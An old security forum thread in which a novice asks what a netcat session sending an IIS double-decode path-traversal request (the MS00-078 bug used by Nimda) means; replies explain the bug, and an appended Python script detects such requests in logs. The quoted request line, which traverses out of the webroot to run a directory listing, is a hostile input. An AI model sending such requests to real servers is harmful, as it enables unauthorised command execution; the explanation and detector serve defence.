-
May 1st, 2006, 04:19 AM
#1
Junior Member
Hey guys, I'm a noob and I'm confused about this command script written as a netcat command script. Can someone translate this script? I mean, what each part is for.
For example, the script is:
C:TMP/NC/nc -v -n ristbook 80
ristbook [128.1.71.103] 80 http (open)
get http://ristbook/scripts/..%255c../wi....exe?/c+dir+c:
I understand that netcat is logged in to ristbook port 80, but what does the command script mean? (after ristbook [128.1.71.103] 80 http (open))
-
May 1st, 2006, 08:17 AM
#2
Hi, and welcome to AO.
I have created a new thread for you, as you have a new question.
-
May 1st, 2006, 09:54 AM
#3
Originally posted here by noob_hacker
C:TMP/NC/nc -v -n ristbook 80
ristbook [128.1.71.103] 80 http (open)
get http://ristbook/scripts/..%255c../wi....exe?/c+dir+c:
I understand that netcat is logged in to ristbook port 80, but what does the command script mean? (after ristbook [128.1.71.103] 80 http (open))
You're using the HTTP protocol (GET) to abuse the double decode bug in IIS. It's the same bug Nimda tries to abuse.. It's about 6 years old.. Shouldn't work anymore...
RFC 2616 HTTP 1.1
Aggressive Propagation of Nimda Worm
MS00-078
Oliver's Law:
Experience is something you don't get until just after you need it.
-
May 3rd, 2006, 01:25 PM
#4
Junior Member
Uh... can't grasp anything for a layman like me... So by using the command *get* then http means I activated a bug (?) that gives me information about the structure of the HTTP I'm looking at? Cool...
Oh ya, btw, can you give me some more info about what other commands I can give on an HTTP port?
-
May 3rd, 2006, 01:44 PM
#5
Originally posted here by noob_hacker
Uh... can't grasp anything for a layman like me...
Then why are you trying to exploit something? Learn the basics first..
So by using the command *get* then http means I activated a bug (?) that gives me information about the structure of the HTTP I'm looking at? Cool...
Not quite my friend... You're GETting something from a webserver.. The bug (MS00-078) is in the way IIS handles the %255c.. Which results in an ability to break out of the webroot..
Oh ya, btw, can you give me some more info about what other commands I can give on an HTTP port?
Read RFC-2616...
Oliver's Law:
Experience is something you don't get until just after you need it.
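The point made in reply #5 is that the request works because IIS decoded the path once for its security check and a second time before using it, so `%255c` passes the check as `%5c` and is then used as `\`. The following detector, added here as an example and not posted by anyone in this thread, classifies request paths from web server logs by applying that second decode itself. The log lines and the `placeholder.exe` target are constructed for the example; the regular expression and the `classify` labels are this example's own choices.

```python
"""Classify request paths for single- and double-decoded path traversal.

Background (MS00-078 "double decode"): the server validated the path after
one round of percent-decoding, then decoded it again before use. Checking
the path at every decode stage, as this example does, closes that gap.
"""
import re
from urllib.parse import unquote

# A '..' segment delimited by '/' or '\' on either side (or path start/end).
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def decode_stages(path):
    """Return the path as received, after one decode, and after two decodes."""
    once = unquote(path)      # '%255c' -> '%5c'
    twice = unquote(once)     # '%5c'   -> '\'
    return path, once, twice


def classify(path):
    """Label a request path.

    'plain-traversal'          : '..' visible raw or after one decode
    'double-decode-traversal'  : '..' only appears after the second decode,
                                 i.e. the MS00-078 pattern
    'clean'                    : no traversal at any stage
    """
    raw, once, twice = decode_stages(path)
    if TRAVERSAL.search(raw) or TRAVERSAL.search(once):
        return "plain-traversal"
    if TRAVERSAL.search(twice):
        return "double-decode-traversal"
    return "clean"


def parse_request_line(line):
    """Extract the path from an HTTP request line like 'GET /x HTTP/1.0'."""
    parts = line.split()
    if len(parts) < 2:
        return None
    return parts[1]


# Constructed sample request lines (not real traffic).
SAMPLE_LINES = [
    "GET /scripts/..%255c../placeholder.exe?/c+dir+c: HTTP/1.0",
    "GET /scripts/../../placeholder.exe HTTP/1.0",
    "GET /scripts/..%5c../placeholder.exe HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /files/a..b/c.txt HTTP/1.0",
]


def scan(lines):
    """Return (line, label) pairs; lines with no parsable path are skipped."""
    results = []
    for line in lines:
        path = parse_request_line(line)
        if path is None:
            continue
        results.append((line, classify(path)))
    return results


if __name__ == "__main__":
    for line, label in scan(SAMPLE_LINES):
        print(f"{label:25} {line}")
```

The third sample (`%5c`, single-encoded) is caught as plain traversal after one decode, while the first only reveals `..\..` on the second decode, which is exactly the case a single-decode check misses. `a..b` is left alone because the `..` is not a path segment on its own.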